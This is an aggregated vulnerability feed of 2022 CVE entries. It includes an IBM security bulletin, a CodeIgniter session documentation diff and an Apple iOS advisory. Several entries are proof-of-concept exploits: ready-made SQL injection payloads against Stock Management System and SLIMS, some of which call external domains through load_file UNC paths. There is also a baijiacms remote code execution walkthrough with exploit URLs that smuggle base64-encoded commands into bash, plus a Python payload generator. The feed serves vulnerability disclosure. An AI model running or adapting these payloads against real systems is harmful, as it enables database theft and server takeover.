Stock Management System 2022 version 1.0 from Erick Cesar suffers from a remote SQL injection vulnerability.

    ## Title: Stock-Management-System-2022-1.0-from-Erick-Cesar Multiple SQLi## Author: nu11secur1ty## Date: 12.22.2022## Vendor: https://github.com/rickxy/Stock-Management-System## Software: https://github.com/rickxy/Stock-Management-System## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Stock-Management-System-1.0## Description:The `user` parameter appears to be vulnerable to SQL injection attacks.The payload ' was submitted in the user parameter, and a databaseerror message was returned.The attacker can still all information for the system by using thisvulnerability.## STATUS: HIGH Vulnerability - CRITICAL[+] Payload:```MySQL---Parameter: user (POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: user=bqxDgfIK' RLIKE (SELECT (CASE WHEN (8457=8457) THEN0x627178446766494b ELSE 0x28 END)) AND'BTvs'='BTvs&password=s9U!o7d!C0&btnlogin=    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: user=bqxDgfIK' AND (SELECT 5004 FROM(SELECTCOUNT(*),CONCAT(0x7178767071,(SELECT(ELT(5004=5004,1))),0x7171707a71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND'aQfu'='aQfu&password=s9U!o7d!C0&btnlogin=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: user=bqxDgfIK' AND (SELECT 8137 FROM(SELECT(SLEEP(7)))nCyy) AND 'vQsi'='vQsi&password=s9U!o7d!C0&btnlogin=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Stock-Management-System-1.0)## Proof and Exploit:[href](https://streamable.com/gg7pyf)## Time spent`00:05:00`## Writing an exploit`00:05:00`

Stock Management System 2022 1.0 From Erick Cesar SQL Injection

IBM Navigator for i 7.3, 7.4, and 7.5 could allow an authenticated user to obtain sensitive information for an object they are authorized to but not while using this interface. By performing a UNION based SQL injection an attacker could see file permissions through this interface. IBM X-Force ID: 239304.

**Security Bulletin**

  

**Summary**

IBM Navigator for i provides server administration functionality for IBM i. An authenticated user with authority to interact with IBM Navigator for i is able to download log files, view file attributes, and perform SQL injection attacks as described in the vulnerability details section. IBM Navigator for i has fixed the issues as described in the remediation/fixes section.

**Vulnerability Details**

**CVEID:**   CVE-2022-43859  
**DESCRIPTION:**   IBM Navigator for i could allow an authenticated user to obtain sensitive information for an object they are authorized to but not while using this interface. By performing a UNION based SQL injection an attacker could see file permissions through this interface.  
CVSS Base score: 6.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/239304 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)

**CVEID:**   CVE-2022-43857  
**DESCRIPTION:**   IBM Navigator for i could allow an authenticated user to access IBM Navigator for i log files they are authorized to but not while using this interface. The remote authenticated user can bypass the interface checks and download log files by modifying servlet filter.  
CVSS Base score: 4.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/239301 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)

**CVEID:**   CVE-2022-43858  
**DESCRIPTION:**   IBM Navigator for i could allow an authenticated user to access the file system and download files they are authorized to but not while using this interface. The remote authenticated user can bypass the interface checks by modifying a parameter thereby gaining access to their files through this interface.  
CVSS Base score: 4.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/239303 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)

**CVEID:**   CVE-2022-43860  
**DESCRIPTION:**   IBM Navigator for i could allow an authenticated user to obtain sensitive information they are authorized to but not while using this interface. By performing an SQL injection an attacker could see user profile attributes through this interface.  
CVSS Base score: 4.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/239305 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM i

7.5

IBM i

7.4

IBM i

7.3

  

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

21 Dec 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSTS2D","label":"IBM i 7.3 Preventative Service Planning"},"Component":"","Platform":\[{"code":"PF012","label":"IBM i"}\],"Version":"7.3.0","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}},{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSB23CE","label":"IBM i 7.5 Preventative Service Planning"},"Component":"","Platform":\[{"code":"PF012","label":"IBM i"}\],"Version":"7.5.0","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}},{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SWG60","label":"IBM i"},"Component":"","Platform":\[{"code":"PF012","label":"IBM i"}\],"Version":"7.5.0,7.4.0, 7.3.0","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}},{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SS9QQS","label":"IBM i 7.4 Preventative Service Planning"},"Component":"","Platform":\[{"code":"PF012","label":"IBM i"}\],"Version":"7.4.0","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}}\]

CVE-2022-43859: IBM Navigator for i is vulnerable to log file access, obtaining file attributes, and SQL Injection attacks due to multiple vulnerabilities.

The search term could have been specified externally to trigger SQL injection. This vulnerability affects Firefox for iOS < 101.

Sorry, I can't find "_1767205?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2022-1887: Invalid Bug ID

CodeIgniter is a PHP full-stack web framework. When an application uses (1) multiple session cookies (e.g., one for user pages and one for admin pages) and (2) a session handler is set to `DatabaseHandler`, `MemcachedHandler`, or `RedisHandler`, then if an attacker gets one session cookie (e.g., one for user pages), they may be able to access pages that require another session cookie (e.g., for admin pages). This issue has been patched, please upgrade to version 4.2.11 or later. As a workaround, use only one session cookie.

@@ -358,8 +358,8 @@ same way: unusable during the same request after you destroy the session.  
You may also use the \`\`stop()\`\` method to completely kill the session by removing the old session\_id, destroying all data, and destroying the cookie that contained the session id: by removing the old session ID, destroying all data, and destroying the cookie that contained the session ID:  
.. literalinclude:: sessions/038.php  
@@ -390,26 +390,35 @@ all of the options and their effects. You'll find the following Session related preferences in your \*\*app/Config/App.php\*\* file:  
\============================== ============================================ ================================================= ============================================================================================ Preference Default Options Description \============================== ============================================ ================================================= ============================================================================================ \*\*sessionDriver\*\* CodeIgniter\\\\Session\\\\Handlers\\\\FileHandler CodeIgniter\\\\Session\\\\Handlers\\\\FileHandler The session storage driver to use. CodeIgniter\\\\Session\\\\Handlers\\\\DatabaseHandler CodeIgniter\\\\Session\\\\Handlers\\\\MemcachedHandler CodeIgniter\\\\Session\\\\Handlers\\\\RedisHandler CodeIgniter\\\\Session\\\\Handlers\\\\ArrayHandler \*\*sessionCookieName\*\* ci\_session \[A-Za-z\\\_\-\] characters only The name used for the session cookie. \*\*sessionExpiration\*\* 7200 (2 hours) Time in seconds (integer) The number of seconds you would like the session to last. If you would like a non-expiring session (until browser is closed) set the value to zero: 0 \*\*sessionSavePath\*\* null None Specifies the storage location, depends on the driver being used. \*\*sessionMatchIP\*\* false true/false (boolean) Whether to validate the user's IP address when reading the session cookie. Note that some ISPs dynamically changes the IP, so if you want a non-expiring session you will likely set this to false. \*\*sessionTimeToUpdate\*\* 300 Time in seconds (integer) This option controls how often the session class will regenerate itself and create a new session ID. Setting it to 0 will disable session ID regeneration. \*\*sessionRegenerateDestroy\*\* false true/false (boolean) Whether to destroy session data associated with the old session ID when auto-regenerating the session ID. When set to false, the data will be later deleted by the garbage collector. \============================== ============================================ ================================================= ============================================================================================ \============================== ================== =========================== ============================================================ Preference Default Options Description \============================== ================== =========================== ============================================================ \*\*sessionDriver\*\* FileHandler::class FileHandler::class The session storage driver to use. DatabaseHandler::class All the session drivers are located in the MemcachedHandler::class \`\`CodeIgniter\\Session\\Handlers\\\`\` namespace. RedisHandler::class ArrayHandler::class \*\*sessionCookieName\*\* ci\_session \[A-Za-z\\\_\-\] characters only The name used for the session cookie. The value will be included in the key of the Database/Memcached/Redis session records. So, set the value so that it does not exceed the maximum length of the key. \*\*sessionExpiration\*\* 7200 (2 hours) Time in seconds (integer) The number of seconds you would like the session to last. If you would like a non-expiring session (until browser is closed) set the value to zero: 0 \*\*sessionSavePath\*\* null None Specifies the storage location, depends on the driver being used. \*\*sessionMatchIP\*\* false true/false (boolean) Whether to validate the user's IP address when reading the session cookie. Note that some ISPs dynamically changes the IP, so if you want a non-expiring session you will likely set this to false. \*\*sessionTimeToUpdate\*\* 300 Time in seconds (integer) This option controls how often the session class will regenerate itself and create a new session ID. Setting it to 0 will disable session ID regeneration. \*\*sessionRegenerateDestroy\*\* false true/false (boolean) Whether to destroy session data associated with the old session ID when auto-regenerating the session ID. When set to false, the data will be later deleted by the garbage collector. \============================== ================== =========================== ============================================================  
.. note:: As a last resort, the Session library will try to fetch PHP's session related INI settings, as well as legacy CI settings such as @@ -498,9 +507,9 @@ permissions will probably break your application. Instead, you should do something like this, depending on your environment ::  
mkdir /<path to your application directory>/Writable/sessions/ chmod 0700 /<path to your application directory>/Writable/sessions/ chown www-data /<path to your application directory>/Writable/sessions/ \> mkdir /<path to your application directory>/writable/sessions/ \> chmod 0700 /<path to your application directory>/writable/sessions/ \> chown www-data /<path to your application directory>/writable/sessions/  
Bonus Tip \--------- @@ -518,6 +527,8 @@ In addition, if performance is your only concern, you may want to look into using \`tmpfs <https://eddmann.com/posts/storing-php-sessions-file-caches-in-memory-using-tmpfs/\>\`\_, (warning: external resource), which can make your sessions blazing fast.  
.. \_sessions-databasehandler-driver:  
DatabaseHandler Driver \======================  
@@ -561,6 +572,10 @@ For PostgreSQL::  
CREATE INDEX "ci\_sessions\_timestamp" ON "ci\_sessions" ("timestamp");  
.. note:: The \`\`id\`\` value contains the session cookie name (\`\`Config\\App::$sessionCookieName\`\`) and the session ID and a delimiter. It should be increased as needed, for example, when using long session IDs.  
You will also need to add a PRIMARY KEY \*\*depending on your 'sessionMatchIP' setting\*\*. The examples below work both on MySQL and PostgreSQL::  
@@ -595,6 +610,8 @@ when it generates the code. done processing session data if you're having performance issues.  
.. \_sessions-redishandler-driver:  
RedisHandler Driver \===================  
@@ -631,6 +648,8 @@ sufficient:  
.. literalinclude:: sessions/041.php  
.. \_sessions-memcachedhandler-driver:  
MemcachedHandler Driver \=======================

CVE-2022-46170: Merge pull request from GHSA-6cq5-8cj7-g558 · codeigniter4/CodeIgniter4@f9fb657

AyaCMS v3.1.2 was found to have a code flaw in the ust_sql.inc.php file, which allows attackers to cause command execution by inserting malicious code.

Vulnerable path ：/aya/module/admin/ust\_sql.inc.php  
Vulnerability description: In the ust\_sql.inc.php file, the $dir parameter is composed of year, month, day\_hour, minute and second\_random four characters. When we back up the database, the system will query all the data and save the data to /backup/$dir/path , and stored in 1.php file format, but in the process of data insertion, reading and writing, the data is not strictly filtered, only the special characters in the string used in the SQL statement are escaped through the mysql\_escape\_string function, so we can Randomly add malicious php codes such as in articles, messages and other functions, and finally write the malicious codes into the 1.php backup file by backing up the database. When we visit the 1.php file again , which can cause the command to be executed.  
  

We can freely add malicious php codes in articles, messages and other functions  
  
Finally, by backing up the database, write the malicious code into the 1.php backup file  
  
  
Remember this folder name  
  
Then we go to access the 1.php file in this folder，We can find that the malicious code executes  
  
And we can write PHP Trojans to execute system commands and control servers。

CVE-2022-46101: AyaCMS v3.1.2 RCE vulnerability · Issue #6 · loadream/AyaCMS

Apache ShardingSphere-Proxy prior to 5.3.0 when using MySQL as database backend didn't cleanup the database session completely after client authentication failed, which allowed an attacker to execute normal commands by constructing a special MySQL client. This vulnerability has been fixed in Apache ShardingSphere 5.3.0.

**Apache ShardingSphere-Proxy Incomplete Cleanup vulnerability**

High severity GitHub Reviewed Published Dec 22, 2022 • Updated Dec 22, 2022

GHSA-wmxm-6wxc-3xqf: Apache ShardingSphere-Proxy Incomplete Cleanup vulnerability

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2022-45347

Apple Security Advisory 2022-12-13-3 - iOS 16.1.2 addresses a code execution vulnerability.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2022-12-13-3 iOS 16.1.2iOS 16.1.2 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213516.WebKitAvailable for: iPhone 8 and laterImpact: Processing maliciously crafted web content may lead toarbitrary code execution. Apple is aware of a report that this issuemay have been actively exploited against versions of iOS releasedbefore iOS 15.1.Description: A type confusion issue was addressed with improved statehandling.WebKit Bugzilla: 248266CVE-2022-42856: Clément Lecigne of Google's Threat Analysis GroupThis update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 16.1.2".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFYEACgkQ4RjMIDkeNxll4hAAolqnH+W3gE3w2Xri3wUchwkj6WPhfWcwwc+l0cxUxiDqzhGSkW4kNTVIeCjENaJ4WfsK7COfxx8qnmQtcqV8P406XtDomeE96Rm/euCEzkSpVPSs4S8+YwvOqRNWVbWmWQ1gKFSqkuZb2Y5IAnA+KI3Fw1M1iq8Cbs/bkUVjNfrIrrPgl19BercEOjsjq+BQS15dIq84GUiSv/KTU31NKMeSQLB8O9+u91tuBex2b+1mdwb15K1R17OIe/exVA2qnQFctfhWu2uh2izckATylQjtvQHMr0pAwdEoLyRl1xXrW62DeVwWBsn0bxUhjSfS/clmXyN/hL1ocgUrHrI9yAVST5oug/LqR8RjTkgTBcGF9C0YMXaexvA0y2AhF70pl67UESleBSRddayFAW2lZkV/YdJosxGLsRviy8jdiiQ4VJ5xI9TAECbUGgF2qHVSz4gnlyyDUfUqHUmjLej48qCMbadY4IQQmvW30yiCW+shHfaLzCBYZ2cLhUCD7IqU7C1+KE+bJ1Y/k7EXOkLWhZ9go7kKUF6OfpVd6OPIYd4R38eghUXU4ZviQwYQlkXm1Q+DZrwaOvMf0kMkCA/10ktuzhKSpiCI/47BqcE8VYi0CCbOUaSZSPi6P0jlpuIsxCd1UKkGaTsfdJIyeNY1VPHkiOl2BYpIelCqqhOiNHc==wMpD-----END PGP SIGNATURE-----

Apple Security Advisory 2022-12-13-3

Senayan Library Management System version 9.2.2 suffers from a remote SQL injection vulnerability.

    ## Title: Senayan Library Management System v9.2.2 a.k.a SLIMS 9 Multiple SQLi-Not sanitizing correctly cookie session.## Author: nu11secur1ty## Date: 12.20.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.2## Reference:https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2/SQLi## Description:The manual insertion `point 3, 4, and 5` appears to be vulnerable to SQLinjection attacks. The payload '+(select load_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.stupid.com\\dzd'))+' was submittedin the manual insertion `point 3`.This payload injects a SQL sub-query that calls MySQL's load_file functionwith a UNC file path that references a URL on an external domain.After manual testing: The parameters class, collType and membershipType arevulnerable to SQLi attacks!The application interacted with that domain, indicating that the injectedSQL query was executed.The attacker can take information from all database columns of this systemby using this vulnerability.Not sanitizing correctly cookie session.## STATUS: HIGH Vulnerability[+] Payload:```MySQL00---Parameter: class (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY orGROUP BY clause    Payload: reportView=true&year=2002&class=bbbb'+(select load_file('\\\\716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''+(selectload_file('\\\\1rtb9wq2997df8x4x2cdtmp4kvqoee255twjjb70.slims.web.id\\avg'))+''RLIKE (SELECT (CASE WHEN (2920=2920) THEN 0x62626262+(selectload_file(0x5c5c5c5c37313667623163666539676b6a61347a646a34357178783932303876776c6b636e30656e3662762e736c696d732e7765622e69645c5c6e6271))+''+(selectload_file(0x5c5c5c5c3172746239777132393937646638783478326364746d70346b76716f656532353574776a6a6237302e736c696d732e7765622e69645c5c617667))+''ELSE 0x28 END)) AND 'xMPZ'='xMPZ&membershipType=a''&collType=aaaa'+(selectload_file('\\\\dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+''+(selectload_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id\\dzd'))+'---01---Parameter: collType (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY orGROUP BY clause    Payload: reportView=true&year=2002&class=bbbb'+(select load_file('\\\\716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''+(selectload_file('\\\\1rtb9wq2997df8x4x2cdtmp4kvqoee255twjjb70.slims.web.id\\avg'))+'&membershipType=a''&collType=aaaa'+(selectload_file('\\\\dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+''+(selectload_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id\\dzd'))+''RLIKE (SELECT (CASE WHEN (2279=2279) THEN 0x61616161+(selectload_file(0x5c5c5c5c646374697930687a69777a643478756a6671716366643375756c306b6f61633166703666743968792e736c696d732e7765622e69645c5c777466))+''+(selectload_file(0x5c5c5c5c617a6469746d3536316837666b7533796a39397573386e653235387a77706b676e346575316f70642e736c696d732e7765622e69645c5c647a64))+''ELSE 0x28 END)) AND 'MGZY'='MGZY---03---Parameter: membershipType (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY orGROUP BY clause    Payload: reportView=true&year=2002&class=bbbb'+(select load_file('\\\\716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''+(selectload_file('\\\\1rtb9wq2997df8x4x2cdtmp4kvqoee255twjjb70.slims.web.id\\avg'))+'&membershipType=a'''RLIKE (SELECT (CASE WHEN (7628=7628) THEN 0x612727 ELSE 0x28 END)) AND'ckmk'='ckmk&collType=aaaa'+(select load_file('\\\\dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+''+(selectload_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id\\dzd'))+'---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2/SQLi)## Reference:[Using HTTP cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies)## Proof and Exploit:[href](https://streamable.com/1m0y6c)## Time spent`00:35:00`## Writing an exploit`00:15:00`

Senayan Library Management System 9.2.2 SQL Injection

A Remote Code Execution (RCE) vulnerability was found in includes/baijiacms/common.inc.php in baijiacms v4.

项目地址：https://github.com/baijiacms/baijiacmsV4  
版本：V4.1.4 20170105 FINAL  
环境：

*   php 5.5.38
*   nginx 1.15
*   mysql 5.7.27
*   20.04.1-Ubuntu

漏洞点在文件includes/baijiacms/common.inc.php  
第654行。

**利用**

这个system的功能本来是为了执行压缩图片的。所以要利用该漏洞，需要先登录后台，在附近设置中设置图片压缩比例，否则代码无法运行到此处。

EXP1：http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/poc.;echo${IFS}cGluZyBwb2MuZXhyNm1xLmNleWUuaW8gLWMgNA==|base64${IFS}-d|bash;&status=1&beid=1

EXP2：http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/whoami.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;&status=1&beid=1

其中poc可以使用一下代码生成，随后开启web服务确保可以被访问到即可

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  
18  
19  
20  

import base64  
  
cmd = input("cmd>>> ")   
  
b64cmd = base64.b64encode(cmd.encode()).decode()  
  
payload = f"echo {b64cmd}|base64 -d|bash"  
  
print(payload)  
payload = payload.replace(' ','${IFS}')  
print(payload)  
  
name = input("name>>>")  
payload = f"{name}.;{payload};"  
print(payload)  
  
with open(file=webpath+payload,mode='w')as f:  
    f.write('1')  
  
  

**原理**

在该漏洞中，漏洞点为文件includes/baijiacms/common.inc.php  
第654行的system()。该函数位于file\_save()函数中。

1  

system('convert'.$quality\_command.' '.$file\_full\_path.' '.$file\_full\_path);  

其中，$quality\_command无法控制，能够控制的只有$file\_full\_path。

由于上一步调用file\_save()的，是fetch\_net\_file\_upload()函数的return部分

$file\_full\_path的定义往上翻为：

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  

$file\_full\_path = WEB\_ROOT .$path . $extpath. $filename;  
  
  
$path = '/attachment/';  
$extpath\="{$extention}/" . date('Y/m/');  
$filename = random(15) . ".{$extention}";  
  
  
$extention = pathinfo($url,PATHINFO\_EXTENSION );  
  

所以能使用的payload只能存在于url后的文件名后缀中，且payload中由于代码功能的限制不能出现，

*   htmlspecialchars()
    
    *   includes/baijiacms.php line92 :$\_GP = irequestsplite($\_GP);
    *   &
    *   “
    *   ’
    *   <
    *   \>
*   后缀 (pathinfo())
    
    *   includes/baijiacms/common.inc.php line 617 :$extention = pathinfo($url,PATHINFO\_EXTENSION );
    *   .
*   file\_get\_contents()
    
    *   includes/baijiacms/common.inc.php line632 :if (file\_put\_contents($file\_tmp\_name, file\_get\_contents($url)) == false) {
    *   空格
*   文件名
    
    *   web服务器系统类型，在windows下限制颇多
    *   windows
        *   \\
        *   /
        *   :
        *   \*
        *   ?
        *   |
    *   linux
        *   /

**htmlspecialchars()**

在该系统中，所有的参数都会经过includes/baijiacms.php进行htmlspecialchars过滤

所以payload中首先排除了 < > “ ‘ &这些符号

**pathinfo()**

pathinfo()会返回文件路径的信息

1  

$extention = pathinfo($url,PATHINFO\_EXTENSION );  

代码中传入了PATHINFO\_EXTENSION参数，根据官方介绍，传入该参数，只会返回最后一个扩展名，扩展名以 . 划分。结合后面的分析，所以payload只能存在与扩展名中

**file\_get\_contents()**

这一步有两个条件，首先file\_get\_contents()需要可以get到文件，其次文件中需要有内容满足file\_put\_contents()

1  

if (file\_put\_contents($file\_tmp\_name, file\_get\_contents($url)) == false)   

**$settings\[‘image\_compress\_openscale’\]**

最后在file\_save()中还有一步

1  

if(!empty($settings\['image\_compress\_openscale'\]))  

这一步在略读了代码后才知道，它由函数globaPriveteSystemSetting()获的，取自数据库中。

略读代码后才知道，这个需要在后台中开启图片上传压缩才会在数据库中建立数据。以便后续读取。

所以需要在后台的附件设置中开启并设置图片压缩比例（具体数字随意）

**具体利用过程解析**

EXP:http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/\[whoami.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;\](http://42.193.178.194/whoami.%3Becho%24{IFS}d2hvYW1p|base64%24{IFS}-d|bash%3B)&status=1&beid=1

这端url中，主要起作用的是url参数，其他的只是陪跑的（但是也不能删）。url参数原本是远程图片地址。

首先在自己的vps上设置payload，这里我设置的命令为whoami，为了便于区分payload，文件名也取名为whoami。然后使用python开启web服务。

然后登录baijiacms后台，设置一个压缩比例，保存，然后访问

http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/whoami.%3Becho%24%7BIFS%7Dd2hvYW1p%7Cbase64%24%7BIFS%7D-d%7Cbash%3B&status=1&beid=1

然后我们来看debug。

代码运行到fetch\_net\_file\_upload函数中，走到$extention = pathinfo($url,PATHINFO\_EXTENSION );时，截取到了payload：;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;

随后是mkdir根据时间，后缀，建立文件夹。之后来到if (file\_put\_contents($file\_tmp\_name, file\_get\_contents($url)) == false) 进行判断，这边我为了方便查看file\_get\_contents和file\_put\_contents哪个会出问题，多加了两行代码。

1  
2  

$flag1 = file\_put\_contents($file\_tmp\_name,"1");  
$flag2 = file\_get\_contents($url);  

在这里之后进入file\_save() 。传入了关键的变量

$file\_full\_path：/www/admin/localhost\_80/wwwroot/baijiacmsV4-4.1.4/attachment/;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;/2022/11/G55bRGvfRVr00o3.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;

这边经过几个判断后，最后到达system()，最终传入的命令为。

convert -quality 100 /www/admin/localhost\_80/wwwroot/baijiacmsV4-4.1.4/attachment/;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;/2022/11/AFqEQN31zocEeu1.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash; /www/admin/localhost\_80/wwwroot/baijiacmsV4-4.1.4/attachment/;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;/2022/11/AFqEQN31zocEeu1.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;

由于代码中会根据后缀建立文件夹，所以在system中，payload一共会执行四次，也就是为什么在执行whoami这个payload是，会输出4个www。

**nothing**

1.  在写测试的命令时，如果要用到ping dnslog这类命令，由于linux默认是会一直ping下去的。所以最好加一个-c 4限制次数（系统被搞崩了好多次）
    
2.  php中单引号的字符串和双引号的字符串差距还是挺大的。https://www.cnblogs.com/youxin/archive/2012/02/13/2348551.html。因为这个特性，测试的时候被卡了好久

Tag

#sql